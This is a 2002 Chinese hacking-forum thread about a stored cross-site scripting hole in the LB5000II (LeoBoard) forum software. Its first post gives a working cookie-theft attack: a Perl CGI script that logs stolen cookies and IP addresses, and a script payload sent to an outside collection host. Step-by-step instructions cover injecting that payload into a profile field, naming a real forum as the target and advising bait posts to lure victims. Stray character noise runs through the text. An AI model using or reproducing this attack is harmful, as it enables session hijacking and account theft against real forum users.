查看: 8712|回复: 3

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

[复制链接]
发表于 2002-6-6 11:05:22 | 显示全部楼层 |阅读模式
漏洞描述:
6 @* F$ j0 @: m" \- P  LB5000II是国内流行的CGI程序之一,是在Ikonboard的基础之上改进的,目前最新
0 j( T( c/ P: D% ~6 ^) N# T: t; S版本是LB5000II v20317b,可以http://www.leoboard.com下载。 6 M7 Z3 }2 D% W9 o( R. M  C
  其注册模块未过滤用户资料   最高学历:职业状况:等注册信息 " A& ?/ {) Z1 o* g9 u# \+ W/ h' {2 d. K
导致恶意用户可以通过伪造<s cript>alert(documents.cookie)</s cript> ( u, B  o! `- I6 w& J0 k
进行攻击,进一步可以通过某中方式收集。测试通过
2 O2 ]- V5 a) Q& G) b  a) p测试程序:
5 q3 _/ V) E; @) A4 B5 Q, C  参考漏洞描述。 $ w+ G" t6 q( O& ^
解决方案: # c% Q7 Z6 x; N( I5 Q+ Z
  对用户提交的资料进行过滤
' n. I  y5 r; \    / E8 C! V+ t$ c$ V' b9 o+ v9 y

. p; R4 C) P- t; J请在s8s8论坛访问 0 Z5 h. x7 W+ ^& v
http://www.leothreads.com/cgi-bin/profile.cgi?action=show&member=大刀队 + C5 \* \/ u" i) i6 x
那么你在s8s8.net 的cookie将被我所获取. 9 s9 \8 L+ M, o" g
#!/usr/bin/perl
- v$ ^* D+ {% K. s& F; V#leo.cgi % A: O- X3 l8 \6 W1 v5 w8 F
$url="http://www.s8s8.net";; $ u  \5 x, b; ^( d! n. ~$ O0 {
$method=$ENV{"REQUEST_METHOD"};
0 B: C& ?+ n+ f$ J/ {: Lif(lc($method) eq "get"){$buffer=$ENV{"QUERY_STRING"};} 4 n8 p& e* k9 C8 v; i* [
else{read(STDIN,$buffer,length($ENV{"CONTENT_LENGTH"}));}
8 m$ }/ f  D" ?! B$remote_addr=$ENV{"REMOTE_ADDR"}; 2 I# j) f4 d6 P  v! ~+ e3 Q" \5 x
$buffer=~tr/+/ /;
% b* ~6 I' A4 R* D9 P) G$buffer=~s/%([\dA-Fa-f0-9][\dA-Fa-f0-9])/pack("C",hex($1))/eg; - L* P6 H, _9 r' q9 u  Y8 A
$buffer=$buffer."|$remote_addr\n";
% |7 n% Q* p0 l  r  ropen(FILE,">>leo.txt"); , E% @8 r+ y$ ~: j8 y, J
print FILE $buffer; " L* P3 }9 D+ F
close(FILE);                       - y' I, b( L6 B+ q
print "Location:$url\n\n"; # y' e" c; D/ W9 R! r
上面是我的cookie收集脚本
7 J5 C( b: g) u9 k% z8 J* A------------------------------------------------------------------------------ ; ^: ~% t+ c& q! g% H( b- G' b/ m
范例:以s8s8为例,感谢好友狩猎者 shocknet 帮助测试
9 u6 E" }' ~9 s用大刀队登陆s8s8论坛,编辑个人资料, ' t+ T- ~% w0 P- L4 B1 v3 m
用记事本打开编辑网页 + ^* \. S" e0 H) E& n# m! L
<option value="中专">中专</option>  这一项改成 . F" I: m! `& q
<option value="<s cript>window.open('http://enter.3322.net/cgi-bin/info/leo.cgi?&#39;+documents.cookie)</s cript>">中专</option>   * u& l) C; X# x) c) d4 D9 X
' s) R/ u  [! R* \( O
编辑<FORM action="profile.cgi" method=post name="creator" enctype="multipart/FORM-data"> : d4 W7 ~; U( }6 ]' L- ]" Y, G( l) e% e2 f
改为 + ~* Z1 A7 W( q* A% T) n* _7 U
<FORM action="http://www.leothreads.com/cgi-bin/profile.cgi"; method=post name="creator" enctype="multipart/FORM-data">
' h- P" T: T0 y5 @保存编辑的网页,用自己的页登陆,选“中专”一项,提交数据,
, N, N" x* L, f这样以后只要查看大刀队的资料的用户,那么查看者的cookie资料将被截获。 4 `3 @$ L! G) K3 w; ]
为了伪装的更好,可以在论坛发具有诱惑力的帖子连接,吸引人家去点击, , e2 V# f& i6 K" J' V
什么算诱惑力呢,自己发挥吧。
1 P/ @7 K& P5 K' `2 C1 d
发表于 2002-6-8 12:21:09 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我连怎么设置超连接都不懂~~~汗~!能教教我吗?9 g% {) p) ]! f& N% h
(我指在贴上设置)
+ t) B1 J" H8 L) h1 \
发表于 2002-6-24 19:03:26 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

我们的论坛虽然是使用这个程序!但没这个问题!& e+ O/ `- a8 E; |
 楼主| 发表于 2002-6-25 11:25:20 | 显示全部楼层

雷傲跨站脚本漏洞收集用户cookie漏洞,适合与任何版本,任何系统

那当染好了啊
您需要登录后才可以回帖 登录 | 注册

本版积分规则

关闭

站长推荐上一条 /1 下一条

相关侵权、举报、投诉及建议等,请发 E-mail:yesdong@qq.com

Powered by Discuz! X5.0 Licensed © 2001-2026 Discuz! Team.44152102000001

在本版发帖QQ客服返回顶部